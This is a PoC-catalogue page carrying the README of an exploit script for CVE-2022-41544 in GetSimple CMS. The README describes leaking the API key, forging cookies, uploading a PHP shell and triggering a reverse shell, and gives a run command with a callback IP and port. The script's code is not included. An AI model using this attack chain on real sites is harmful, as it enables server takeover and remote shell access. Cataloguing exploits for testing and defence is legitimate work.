POC详情: 36357b1dd5b08269306235b0e6b1f33204f041c6

来源
关联漏洞
标题: GetSimple CMS 安全漏洞 (CVE-2022-41544)
描述:GetSimple CMS是一套使用PHP语言编写的内容管理系统(CMS)。 GetSimple CMS v3.3.16版本存在安全漏洞,该漏洞源于通过admin/theme-edit.php中的edited_file参数发现包含远程代码执行(RCE)漏洞。
描述
Exploit script for CVE-2022-41544 in GetSimple CMS, with enhanced error handling and detailed usage instructions.
介绍
# CVE-2022-41544 Exploit Script

This repository contains a script to exploit CVE-2022-41544 vulnerability in GetSimple CMS. The script performs several steps to check for vulnerabilities, leak API keys, set cookies, obtain CSRF tokens, upload a shell, and trigger the shell.

## Changes and Improvements

1. **Deprecation Warning Handling**: Removed the deprecated `telnetlib` import as it was not necessary for the script's functionality.
2. **Enhanced Error Handling**: Added more robust error handling for HTTP requests and XML parsing.
3. **Improved User Feedback**: Provided detailed feedback for each step to help users understand the script's progress and any issues encountered.
4. **Input Validation**: Ensured that the user inputs for the target, path, and credentials are validated.
5. **Documentation and Comments**: Added comments and documentation to improve code readability and usability.

## Usage

1. **Clone the Repository**:
    ```bash
    git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
    cd CVE-2022-41544
    ```

2. **Install Dependencies**:
    Ensure you have Python 3 installed along with the `requests` library.
    ```bash
    pip3 install requests
    ```

3. **Run the Script**:
    ```bash
    python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
    ```

    - `<target>`: The target domain or IP address.
    - `<path>`: The path to the GetSimple CMS installation.
    - `<ip:port>`: The IP and port for the reverse shell.
    - `<username>`: The admin username for the GetSimple CMS.

    Example:
    ```bash
    python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin
    ```
![image](https://github.com/user-attachments/assets/ddf85b4b-664c-4f88-8692-356cbe38b447)

![image](https://github.com/user-attachments/assets/31b056df-9df9-452f-94f2-a7ebd96c1576)


## Script Overview

### Functions

- `print_the_banner()`: Displays a stylized banner using ASCII art.
- `get_version(target, path)`: Checks if the target version of GetSimple CMS is vulnerable.
- `api_leak(target, path)`: Attempts to retrieve an API key from an authorization XML file.
- `set_cookies(username, version, apikey)`: Sets cookies required for further requests based on the retrieved API key.
- `get_csrf_token(target, path, headers)`: Extracts a CSRF token necessary for uploading a shell.
- `upload_shell(target, path, headers, nonce, shell_content)`: Uploads a PHP shell to the target server.
- `shell_trigger(target, path)`: Triggers the uploaded shell to establish a reverse shell connection.

### Main Function

The `main()` function orchestrates the entire process by calling the above functions in sequence to exploit the CVE-2022-41544 vulnerability.

## Author

This script was developed by Dilanka Kaushal Hewage (**n3rdyn3xus**).

## Disclaimer

This script is provided for educational purposes only. Unauthorized access to systems is illegal and unethical. Use this script responsibly and only on systems you have explicit permission to test.

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

文件快照

[4.0K] /data/pocs/36357b1dd5b08269306235b0e6b1f33204f041c6 ├── [4.7K] CVE-2022-41544.py ├── [1.0K] LICENSE └── [3.0K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。